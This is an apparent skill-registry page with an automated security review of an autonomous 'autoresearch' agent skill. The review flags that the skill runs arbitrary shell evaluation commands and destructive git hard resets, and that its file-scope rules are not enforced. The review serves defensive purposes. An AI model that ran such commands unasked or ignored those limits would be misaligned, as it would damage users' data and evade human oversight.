Skill flagged — suspicious patterns detected
ClawHub Security flagged this skill as suspicious. Review the scan results before using.
Autoresearch Agent
v2.1.1Autonomous experiment loop that optimizes any file by a measurable metric. Inspired by Karpathy's autoresearch. The agent edits a target file, runs a fixed e...
⭐ 0· 83·2 current·2 all-time
byAlireza Rezvani@alirezarezvani
MIT-0
Download zip
LicenseMIT-0 · Free to use, modify, and redistribute. No attribution required.
Security Scan
OpenClaw
Suspicious
high confidencePurpose & Capability
The skill claims no required binaries or credentials, but the included evaluators and scripts clearly rely on external tools: git (used heavily), a Python runtime, build tools (npm/docker) in some evaluators, /usr/bin/time on Linux/macOS, pytest, and optional LLM CLI tools (claude/codex/gemini). Requiring none in the registry metadata is inconsistent with the code and setup examples. These binaries are proportional to the stated goal (running local experiments), but their absence from declared requirements is a mismatch that can cause surprise or misuse.
Instruction Scope
SKILL.md and agent docs instruct the AI to read config/program/results, edit a single target file, commit, and call scripts/run_experiment.py which runs a user-provided eval command with shell=True. Running arbitrary eval_cmd strings (with pipes/redirects) in project root grants broad local execution power; the run_experiment script will run git reset --hard HEAD~1 to revert failed experiments. The human-facing rules ("Never modify files outside the target file") are not enforced by the runtime; the agent or a faulty/compromised agent could break that constraint. Overall the instruction scope aligns with optimizing files but includes high-risk operations (arbitrary shell eval, destructive git resets).
Install Mechanism
There is no external install mechanism in the registry (instruction-only), which is lower risk. The skill bundle includes scripts that the user runs (setup_experiment.py) to create .autoresearch/ in the project or ~/, so code will be written to disk only when the user runs the setup script. No external downloads or obscure installers are used in the included files.
Credentials
The skill declares no required environment variables or credentials, but several evaluators implicitly require external tooling and possibly credentials: LLM judges call a CLI tool named 'claude' (or 'codex'/'gemini') which implies the user has configured a CLI and subscription; some evaluators call docker or npm; memory and time-based evaluators assume system utilities. Because these requirements are implicit (not declared), users may unintentionally run experiments that use networked services or paid LLM calls. The number and sensitivity of external dependencies is reasonable for the purpose, but the lack of explicit declaration is a proportionality/expectations problem.
Persistence & Privilege
The skill does not request permanent platform-wide privileges (always: false). However it expects local filesystem and git access: it will create/modify .autoresearch/, checkout branches, create commits, and perform hard resets (git reset --hard HEAD~1). These are normal for an autoresearch loop but are impactful: they change repository history and working tree. The SKILL.md instructs not to push to remote, but that is advisory — not programmatically enforced.
What to consider before installing
This skill is coherent with its stated goal (autonomous experiment loops) but has several practical and security caveats you should consider before installing or running it:
- Declared requirements are incomplete: the code expects git, Python, build tools (npm/docker), /usr/bin/time, pytest, and optionally an LLM CLI (e.g., 'claude'). Ensure those tools exist and you are comfortable with them being invoked.
- Arbitrary evaluation commands: experiments run a user-provided evaluate_cmd via shell=True (allowing pipes, redirects, chained commands). Only use evaluate_cmd values you trust; do not point evaluate_cmd at untrusted scripts or remote commands. If you or the agent misconfigures evaluate_cmd it could execute unexpected local or network actions.
- Git is destructive by design: the runner will commit experimental changes and perform hard resets (git reset --hard HEAD~1) to discard non-improvements. Back up important branches and avoid running this on repositories where automatic commits/resets would be harmful. Consider running experiments in a disposable clone or dedicated branch.
- LLM evaluators are implicit: if you plan to use the marketing/content evaluators, confirm you have a CLI tool configured (and understand any cost or data-sharing implications). The skill does not declare nor request credentials, so the tool/credentials are expected to already be present in your environment.
- Start in a safe sandbox: run setup and a few dry-runs on a test repository (or with --dry-run) to observe behavior. Review and optionally edit the evaluator scripts (they are labeled DO NOT MODIFY after experiments start) to ensure they do only what you expect.
- Consider access control: because the agent is allowed to run autonomously, keep the skill user-invocation and scheduling limited to trusted contexts (don't enable it on repos with sensitive data unless you audited the eval_cmd and scripts).
If you want to proceed, first run the setup in an isolated repo, confirm required CLIs are present, and inspect evaluate_cmd and evaluator configuration thoroughly. If you need, I can highlight every place the code executes shell commands and list the exact binaries the scripts call so you can validate them one-by-one.Like a lobster shell, security has layers — review code before you run it.
latestvk978jwdc5vc6sk2wvddc8m2d1n838kwc
License
MIT-0
Free to use, modify, and redistribute. No attribution required.
